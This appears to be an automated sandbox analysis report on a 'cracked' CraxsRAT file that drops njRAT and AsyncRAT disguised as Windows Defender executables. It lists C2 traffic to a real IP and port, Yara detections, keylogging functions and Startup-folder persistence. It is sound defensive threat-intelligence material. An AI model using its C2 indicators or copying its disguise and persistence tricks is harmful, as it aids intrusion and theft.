Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54115 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54115 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54120 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54105 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54112 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54112 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54112 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54122 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54122 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54109 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54114 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54119 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54119 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54124 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54124 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54125 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54118 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54125 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54113 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54080 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54126 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54118 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54081 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54122 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54126 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54116 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54129 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54129 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54115 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54121 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54121 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54128 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54131 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54121 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54128 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54117 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54117 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54131 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54085 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54117 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54085 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54125 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54135 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54135 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54118 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54123 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54123 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54124 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54129 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54110 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54110 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54126 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54110 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54127 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54127 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54138 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54138 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54127 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54130 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54131 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54130 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54140 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54140 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54121 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54134 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54134 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54141 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54142 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54141 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54110 -> 45.145.41.178:2222

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.145.41.178

Yara detected Generic Downloader

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe, type: DROPPED

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:63387 -> 45.145.41.178:2222

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: NNT-AS41228LT NNT-AS41228LT

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:53729
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:53717
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:49704

Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178
Source: unknown	TCP traffic detected without corresponding DNS query: 45.145.41.178

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: Windows Defender Real Time Protection.exe.0.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 0e75fed00639ea9e725255499292dcdd.exe.2.dr, kl.cs	.Net Code: VKCodeToUnicode

E-Banking Fraud

Yara detected Njrat

Source: Yara match	File source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.0.Windows Defender Notification.exe.410000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0000000A.00000000.2480522494.0000000000412000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Creates files with lurking names (e.g. Crack.exe)

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\CraxsRAT v7.6 Cracked.exe.log

Jump to behavior

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 2_2_05973172 NtQuerySystemInformation,		2_2_05973172
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 2_2_05973137 NtQuerySystemInformation,		2_2_05973137

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 2_2_052032D1	2_2_052032D1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Code function: 10_2_00007FF848F2AAA2	10_2_00007FF848F2AAA2
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Code function: 10_2_00007FF848F216C9	10_2_00007FF848F216C9
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Code function: 10_2_00007FF848F23069	10_2_00007FF848F23069
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Code function: 10_2_00007FF848F29CF6	10_2_00007FF848F29CF6
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Code function: 10_2_00007FF848F22065	10_2_00007FF848F22065
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Code function: 10_2_00007FF848F284CD	10_2_00007FF848F284CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FF8490030E9	16_2_00007FF8490030E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF8490130E9	21_2_00007FF8490130E9
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Code function: 27_2_00007FF848F216C9	27_2_00007FF848F216C9
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Code function: 27_2_00007FF848F22065	27_2_00007FF848F22065
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Code function: 27_2_00007FF848F20E78	27_2_00007FF848F20E78

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1864 -s 800

Sample file is different than original file name gathered from version info

Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2493555663.00000000063FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorwks.dllT vs CraxsRAT v7.6 Cracked.exe
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2493555663.0000000006469000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWindows Defender Notification.exe4 vs CraxsRAT v7.6 Cracked.exe
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWindows Defender Notification.exe4 vs CraxsRAT v7.6 Cracked.exe

Uses 32bit PE files

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
